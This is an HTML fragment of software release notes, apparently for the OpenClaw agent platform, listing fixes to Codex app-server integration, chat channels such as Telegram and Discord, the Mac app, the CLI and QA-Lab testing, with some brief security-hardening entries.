<li>Codex app-server: keep native code mode available without forcing code-mode-only so OpenClaw dynamic tool turns complete through the app-server tool bridge. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463653395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83109" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83109/hovercard" href="https://github.com/openclaw/openclaw/issues/83109">#83109</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daswass/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daswass">@daswass</a>.</li>
<li>Release stability: recover stale session diagnostics and Codex OAuth fallback state so stuck runs and reused refresh tokens clear without blocking follow-up work. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467223870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83503/hovercard" href="https://github.com/openclaw/openclaw/pull/83503">#83503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Messages/TTS: apply TTS directives before message-tool sends reach core, gateway, or plugin delivery so opt-in message-tool rooms and proactive sends attach voice notes instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4442404677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81598" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81598/hovercard" href="https://github.com/openclaw/openclaw/issues/81598">#81598</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CG-Intelligence-Agent-Jack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CG-Intelligence-Agent-Jack">@CG-Intelligence-Agent-Jack</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CoronovirusG10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CoronovirusG10">@CoronovirusG10</a>.</li>
<li>Messages/Codex: keep Codex direct/source chats on message-tool visible delivery by default while documenting and testing <code>messages.visibleReplies: "automatic"</code> as the old-mode opt-out; channel wildcard model overrides now apply to direct chats before harness delivery defaults.</li>
<li>Memory/QMD: keep archived session transcript hits visible after QMD export while preserving normal <code>.md</code> session ids that only resemble archive names. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467447669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83518" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83518/hovercard" href="https://github.com/openclaw/openclaw/pull/83518">#83518</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467252934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83506" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83506/hovercard" href="https://github.com/openclaw/openclaw/issues/83506">#83506</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tanshanshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tanshanshan">@tanshanshan</a>.</li>
<li>Codex app-server: preserve network access for sandboxed Codex code-mode turns when the OpenClaw sandbox allows outbound egress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465477650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83347" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83347/hovercard" href="https://github.com/openclaw/openclaw/issues/83347">#83347</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/YusukeIt0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/YusukeIt0">@YusukeIt0</a>.</li>
<li>QA-Lab: keep the OTLP smoke decoder independent of removed OpenTelemetry generated-root internals.</li>
<li>Messages: default group/channel visible replies to automatic final delivery again, keeping <code>message_tool</code> opt-in for ambient/shared rooms and tool-reliable models.</li>
<li>CLI/TUI: force standalone <code>/exit</code> runs to terminate after <code>runTui</code> returns so onboarding-launched TUI children do not stay alive invisibly. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467214589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83501/hovercard" href="https://github.com/openclaw/openclaw/pull/83501">#83501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Agents/code mode: honor per-agent code-mode config in schema, runtime catalog activation, and model payload filtering. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465758765" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83388" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83388/hovercard" href="https://github.com/openclaw/openclaw/issues/83388">#83388</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Agents/code mode: preserve agent, session, run, and channel context in <code>before_tool_call</code> hooks for top-level <code>exec</code>/<code>wait</code> dispatches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465758470" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83387" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83387/hovercard" href="https://github.com/openclaw/openclaw/issues/83387">#83387</a>.</li>
<li>QQBot: shorten C2C typing indicators to a 10-second window renewed every 5 seconds, capped to keep a final passive-reply slot available. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466707249" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83469/hovercard" href="https://github.com/openclaw/openclaw/pull/83469">#83469</a>)</li>
<li>Replies: keep final payload delivery after live preview updates so channels can finalize or send the completed answer instead of losing preview-only drafts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466706226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83468" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83468/hovercard" href="https://github.com/openclaw/openclaw/pull/83468">#83468</a>)</li>
<li>Discord: deliver final replies in progress-mode preview streams instead of deduplicating the final visible message. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466374427" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83443/hovercard" href="https://github.com/openclaw/openclaw/pull/83443">#83443</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/compoodment/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/compoodment">@compoodment</a>.</li>
<li>Providers/Xiaomi: replay MiMo Anthropic-compatible <code>reasoning_content</code> as provider-required thinking blocks even when OpenClaw thinking is disabled, fixing follow-up tool turns for <code>mimo-v2-flash</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465996157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83407" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83407/hovercard" href="https://github.com/openclaw/openclaw/issues/83407">#83407</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xgenious7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xgenious7">@Xgenious7</a>.</li>
<li>Agents/exec approvals: forward approval-runtime credentials on agent-owned Gateway approval calls so approved async commands complete through the existing runtime path instead of stalling on unauthenticated follow-up calls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Gateway/skills: preflight remote macOS skill-bin refreshes with a WebSocket connectivity check so stale node sessions skip quickly instead of logging slow <code>system.which</code> timeout warnings.</li>
<li>CLI/config: keep broken discovered plugins that are not referenced by active config from failing <code>openclaw config validate</code>, while preserving fatal errors for explicitly configured plugin entries.</li>
<li>GitHub Copilot: drop unsafe native Responses reasoning replay items with non-replayable IDs before dispatch, preventing affected Copilot sessions from failing with <code>invalid_request_body</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464490598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83220/hovercard" href="https://github.com/openclaw/openclaw/issues/83220">#83220</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Agents/Codex: fail closed when an explicitly requested Codex harness is not registered instead of silently trying configured model fallbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465485972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83349" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83349/hovercard" href="https://github.com/openclaw/openclaw/issues/83349">#83349</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r2-vibes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r2-vibes">@r2-vibes</a>.</li>
<li>QA-Lab: make runtime tool coverage fail on missing required tool exercise instead of treating pass/pass parity envelope drift as missing coverage.</li>
<li>Core/plugins: harden clawpatch-reported edge cases across gateway auth cleanup, Claude session id paths, plugin activation policy, apply-patch hunk handling, diagnostic redaction, and plugin metadata validation.</li>
<li>UI: show reasoning choices as plain labels instead of leaking internal override wording in session and chat pickers.</li>
<li>Mac app: avoid repeating the Configuration heading inside channel quick settings.</li>
<li>Mac app: keep the Settings sidebar always visible and remove the redundant titlebar hide/show control.</li>
<li>Mac app: normalize Settings pane content margins so pages share the same left and right rail.</li>
<li>Mac app: prefer explicit private/Tailscale/LAN Gateway endpoints over SSH tunnels, preserve legacy loopback tunnel configs, persist transport choices, and show captured SSH stderr when tunneling really fails.</li>
<li>Gateway/sessions: keep ACP/acpx and runtime child sessions visible in configured-only session lists when their owner or parent session belongs to a configured agent.</li>
<li>Mac app: keep app-level menu commands and Dashboard failure states reachable when the remote Gateway is disconnected.</li>
<li>Mac app: allow longer Gateway and Context errors to wrap in the menu instead of truncating the useful failure detail.</li>
<li>Mac app: tighten remote Gateway fields in Settings so the Connection pane keeps readable labels and full action button text.</li>
<li>Mac app: keep custom Settings card rows left-aligned and full-width so Discovery and status sections no longer appear centered or detached.</li>
<li>Mac app: align Location permission controls to the same trailing column as the rest of Settings.</li>
<li>Mac app: add Dashboard, Chat, Canvas, and Settings shortcuts to the Dock icon menu.</li>
<li>Mac app: replace the Settings window's native split-view sidebar with an explicit layout so page content keeps its leading gutter when the sidebar is shown or hidden.</li>
<li>Mac app: render channel quick config as aligned Settings rows and hide schema-only variants that cannot be edited safely from the quick pane.</li>
<li>Gateway/webchat: hide internal runtime-context and other <code>display: false</code> transcript messages from Chat history and live message events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464459552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83216/hovercard" href="https://github.com/openclaw/openclaw/issues/83216">#83216</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EmpireCreator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EmpireCreator">@EmpireCreator</a>.</li>
<li>CLI/help: keep <code>gateway</code>, <code>doctor</code>, <code>status</code>, and <code>health</code> help registration out of action/runtime imports so subcommand <code>--help</code> stays lightweight in constrained terminals. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464522965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83228/hovercard" href="https://github.com/openclaw/openclaw/issues/83228">#83228</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dfguerrerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dfguerrerom">@dfguerrerom</a>.</li>
<li>Cron/Discord: keep explicit announce runs in message-tool-only source-reply mode so scheduled agent turns post once instead of also echoing through automatic visible replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464900333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83261" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83261/hovercard" href="https://github.com/openclaw/openclaw/issues/83261">#83261</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Theralley/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Theralley">@Theralley</a>.</li>
<li>Telegram: preserve forum-topic origin targets in inbound, audio-preflight, and skipped-message hook contexts so follow-up delivery stays bound to the originating topic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465183426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83302" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83302/hovercard" href="https://github.com/openclaw/openclaw/issues/83302">#83302</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/M00zyx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/M00zyx">@M00zyx</a>.</li>
<li>Telegram: retry HTTP 421 Misdirected Request send failures on a fresh fallback transport so transient edge-node routing errors no longer drop outbound replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087256219" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48892" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48892/hovercard" href="https://github.com/openclaw/openclaw/issues/48892">#48892</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087442780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48908" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48908/hovercard" href="https://github.com/openclaw/openclaw/pull/48908">#48908</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarsDoge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarsDoge">@MarsDoge</a>.</li>
<li>Telegram: fail topic sends closed when Telegram reports <code>message thread not found</code> instead of retrying without <code>message_thread_id</code> into the base chat. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465183426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83302" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83302/hovercard" href="https://github.com/openclaw/openclaw/issues/83302">#83302</a>.</li>
<li>Config/subagents: remove ignored agent-model <code>timeoutMs</code> keys, keep subagent model config to primary/fallback selection, and clean shipped stale config through doctor. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465090121" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83291" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83291/hovercard" href="https://github.com/openclaw/openclaw/issues/83291">#83291</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>Mac app: align the Sessions settings pane with the standard Settings page gutter and row spacing.</li>
<li>OpenAI/Codex: stop rejecting available <code>openai-codex</code> GPT-5.1, GPT-5.2, and GPT-5.3 model refs during config validation, while keeping removed Spark aliases suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465210488" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83303" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83303/hovercard" href="https://github.com/openclaw/openclaw/issues/83303">#83303</a>.</li>
<li>Plugins/xAI: complete OAuth-backed xAI login and sidecar auth fixes, including guarded loopback callback CORS handling, video generation polling/defaults, and native-host User-Agent attribution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465339811" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83322" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83322/hovercard" href="https://github.com/openclaw/openclaw/pull/83322">#83322</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaaneek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaaneek">@Jaaneek</a>.</li>
<li>Codex app-server: preserve streamed native command output in mirrored transcripts and trajectory exports when final snapshots omit aggregated output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464273690" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83200" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83200/hovercard" href="https://github.com/openclaw/openclaw/pull/83200">#83200</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rozmiarD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rozmiarD">@rozmiarD</a>.</li>
<li>Codex app-server: fail closed when chat or sender policy denies tools, disabling native code, app, environment, and user MCP surfaces for restricted turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4457945251" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82374" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82374/hovercard" href="https://github.com/openclaw/openclaw/pull/82374">#82374</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Codex app-server: keep recent context-engine messages when oversized projected history is truncated, so short follow-ups in long channel sessions do not fall back to stale earlier turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463799694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83127" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83127/hovercard" href="https://github.com/openclaw/openclaw/pull/83127">#83127</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Codex app-server: keep OpenClaw session spawning searchable while steering Codex-native delegation through native subagents, avoiding duplicate direct subagent surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465370887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83329" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83329/hovercard" href="https://github.com/openclaw/openclaw/pull/83329">#83329</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Codex app-server: recover stale childless Codex-native subagent task mirrors during maintenance and allow their registry rows to be cancelled without an OpenClaw child session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461986275" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82836" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82836/hovercard" href="https://github.com/openclaw/openclaw/pull/82836">#82836</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yshimadahrs-ship-it/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yshimadahrs-ship-it">@yshimadahrs-ship-it</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Feishu: return bound subagent delivery origins from session thread setup so Feishu subagent completions route back to the same DM or topic. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464179397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83190" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83190/hovercard" href="https://github.com/openclaw/openclaw/pull/83190">#83190</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100menotu001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100menotu001">@100menotu001</a>.</li>
<li>CLI/update: tailor post-update Gateway recovery hints by platform, showing systemd, LaunchAgent, Scheduled Task, or generic service-manager guidance instead of macOS-only recovery text. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463495630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83096/hovercard" href="https://github.com/openclaw/openclaw/pull/83096">#83096</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Plugins: apply a default 15-second timeout to legacy <code>before_agent_start</code> hooks so hung plugin handlers no longer block agent startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085154694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48534" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48534/hovercard" href="https://github.com/openclaw/openclaw/issues/48534">#48534</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463837368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83136/hovercard" href="https://github.com/openclaw/openclaw/pull/83136">#83136</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/therahul-yo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/therahul-yo">@therahul-yo</a>.</li>
<li>Feishu: refresh inbound session delivery context for DM, group, and broadcast turns so later replies do not inherit stale WebChat routing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4388788955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78274" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/78274/hovercard" href="https://github.com/openclaw/openclaw/issues/78274">#78274</a>.</li>
<li>Agents/subagents: require the initial subagent registry save before reporting spawn accepted, returning a spawn error instead of losing an untracked run when the registry write fails. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463909257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83146" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83146/hovercard" href="https://github.com/openclaw/openclaw/pull/83146">#83146</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>.</li>
<li>QA-Lab/qa-channel: attach redacted agent tool-start traces to outbound <code>QaBusMessage</code> records so scenarios can assert actual tool use instead of relying only on reply text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275248060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67637" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67637/hovercard" href="https://github.com/openclaw/openclaw/issues/67637">#67637</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: fail live runtime parity reports when assistant-message usage is missing, preventing <code>0 vs 0</code> live token rows from being reported as passing proof. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416721771" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80411/hovercard" href="https://github.com/openclaw/openclaw/issues/80411">#80411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add a runtime token-efficiency sidecar report that classifies Codex savings separately from regressions and fails only positive Codex-over-Pi live token deltas above threshold. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4430998561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81093" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81093/hovercard" href="https://github.com/openclaw/openclaw/issues/81093">#81093</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: fail Codex-backed OpenAI live runtime-pair runs before launching isolated workers when no portable Codex auth is available, while staging API-key fallbacks and configured Codex keys for isolated QA agents. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416721774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80412" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80412/hovercard" href="https://github.com/openclaw/openclaw/issues/80412">#80412</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: refresh parity gates, mock frontier fixtures, model scenarios, and workflow artifact lanes to compare GPT-5.5 against Claude Opus 4.7. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349437446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74262" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74262/hovercard" href="https://github.com/openclaw/openclaw/issues/74262">#74262</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: make mock parity dispatch provider-aware for source discovery and subagent scenarios so OpenAI and Anthropic lanes no longer share identical canned plans. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245036106" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64879/hovercard" href="https://github.com/openclaw/openclaw/issues/64879">#64879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: stop returning Control UI bearer tokens from unauthenticated bootstrap payloads and bind Docker harness ports to loopback-only host addresses. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259596226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66355" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66355/hovercard" href="https://github.com/openclaw/openclaw/pull/66355">#66355</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Mac app: avoid a SwiftUI metadata crash when rendering the Cron Jobs settings pane.</li>
